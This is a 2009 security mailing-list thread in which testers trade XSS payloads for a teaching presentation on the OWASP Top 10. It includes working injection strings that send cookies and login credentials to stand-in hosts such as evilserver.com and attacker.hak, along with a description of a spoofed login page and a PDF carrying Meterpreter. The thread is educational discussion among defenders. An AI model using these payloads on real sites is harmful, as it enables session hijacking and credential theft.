Sorry for being late to the party but a good one I did was to use XSS in a search results page to re-write it to look exactly the same as the login page, it even posted to the real login page so left the user logged in but before doing it it send me a copy of the details, I think through an image request. As the search page could be hit through HTTPS as well as HTTP my login page looked very authentic.
Robin 2009/5/29 Adrian Crenshaw <[email protected]>: > It's won't be held online, but I plan to record and post it. Thanks for all > of the ideas guys. > > Adrian > > On Fri, May 29, 2009 at 9:54 AM, packetjack <[email protected]> wrote: >> >> Sounds like a sweet presentation you're giving, Adrian. I agree, >> the <script>alert("XSS");</script>,is so boring. Kudos to you for making an >> interesting presentation! >> Is this an online presentation? I'd love to see it if so! I test webapps >> and often can prove a site is vuln due to the example given above, but I >> would like to learn some of the ways you and others mentioned, ones that >> will show upper mgt what this "little vuln" is capable of..... >> Mary >> >> On Fri, May 29, 2009 at 7:45 AM, Michael Douglas <[email protected]> >> wrote: >>> >>> While all these samples are really fun, I've lately had great luck by >>> making two different XSS attacks when I'm showing folks. >>> >>> One for the devs -- this tends to be a bit more "fun" and does stuff >>> like click trapping. >>> >>> For marketing or the project managers -- the ones I've found most >>> likely to sweep these bugs under the rug -- I send them "brand damage" >>> examples. (Cock ring size is freaking hilarious, but would send me to >>> HR). So I do things like image swapping, or setting the background to >>> a LOLCat or a competitor logo. >>> >>> The all time XSS FTW moment was about 4 years ago now, when someone >>> found an XSS problem on a McDonald's site. Their link was so damn >>> sweet, it's what got me interested in web app security. when you >>> clicked it, you we sent to a page that had all the McD's wrappings but >>> the content section of the window was blank except for in lovely red >>> letters it said: "Hey FATTIE! You really shouldn't be eating our >>> food!" >>> >>> >>> >>> On Fri, May 29, 2009 at 3:35 AM, <[email protected]> wrote: >>> > You could use a couple of typical password/cookie stealing examples. >>> > >>> > Cookie stealing iframe.: >>> > "><IFRAME >>> > >>> > SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie"; >>> > height="1" width="1" frameborder="0"></IFRAME> >>> > >>> > Altering the logon form.: >>> > "><script>window.onload = >>> > >>> > function()document.loginForm.action='http://evilserver.com/evil.php?details='</script><!---- >>> > >>> > I like to use the logon form example for my penetration testing >>> > presentations as it looks 100% normal to the user, except it redirects >>> > the >>> > Submit button to send the logon information (username/password in most >>> > cases) to your evilserver instead of the real server. You can also >>> > rewrite >>> > the code in the users browser to remove password hashing to make it >>> > easier >>> > to get the clear text password. On the server end I usually just put up >>> > a >>> > Metasploit HTTP or a netcat listener on the evilserver.com address to >>> > output >>> > the traffic to a logfile. You can also log it to a Database for mass >>> > farming >>> > of data, but we don't do that kind of thing, we leave that to Bob ;) >>> > >>> > If you want something evil on the client-side, try an iframe that >>> > references >>> > a PDF file. You can then export a PDF from Metasploit and embed the >>> > Meterpreter payload for total world domination. >>> > >>> > Chris John Riley >>> > >>> > [email protected]@inet wrote on 28.05.2009 >>> > 20:50:39: >>> > >>> >> Ok, I've got yet another presentation coming up, this time on the >>> >> OWASP >>> >> Top 10 >>> >> and Mutillidae. One of the things I'm going to cover is XSS. The >>> >> canonical >>> >> example of course is: >>> >> >>> >> <script>alert("XSS");</script> >>> >> >>> >> but that is boring, and gives folks the impression that XSS is not >>> >> that >>> >> serious. Better short eample swoul be: >>> >> >>> >> Redirect traffic to your site: >>> >> <script>window.location = "http://www.irongeek.com/";</script> >>> >> >>> >> A little cookie Grabbing: >>> >> <script> >>> >> new Image().src="http://some-ip/mutillidae/catch.php?cookie= >>> >> "+encodeURI(document.cookie); >>> >> </script> >>> >> >>> >> Or maybe a password form to make people think they have to login, but >>> >> it >>> >> just >>> >> grabs the credentials: >>> >> <script> >>> >> username=prompt('Please enter your username',' '); >>> >> password=prompt('Please enter your password',' '); >>> >> document.write("<img src=\"http://attacker.hak/catch.php?username= >>> >> "+username+"&password="+password+"\">"); >>> >> </script> >>> >> >>> >> What are other cool thing to inject, besides maybe BeEF, that shows of >>> >> how >>> >> XSS >>> >> can be a big deal? >>> >> >>> >> Thanks, >>> >> Adrian >>> >> _______________________________________________ >>> >> Pauldotcom mailing list >>> >> [email protected] >>> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> >> Main Web Site: http://pauldotcom.com >>> > ---------------------------------------- >>> > Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien, >>> > DVR >>> > 0486809, UID ATU 16351908 >>> > >>> > Der Austausch von Nachrichten mit oben angefuehrtem Absender via E-Mail >>> > dient ausschliesslich Informationszwecken. Rechtsgeschaeftliche >>> > Erklaerungen >>> > duerfen ueber dieses Medium nicht ausgetauscht werden. >>> > Correspondence with above mentioned sender via e-mail is only for >>> > information purposes. This medium may not be used for exchange of >>> > legally-binding communications. >>> > ---------------------------------------- >>> > >>> > >>> > _______________________________________________ >>> > Pauldotcom mailing list >>> > [email protected] >>> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> > Main Web Site: http://pauldotcom.com >>> > >>> _______________________________________________ >>> Pauldotcom mailing list >>> [email protected] >>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> Main Web Site: http://pauldotcom.com >> >> >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
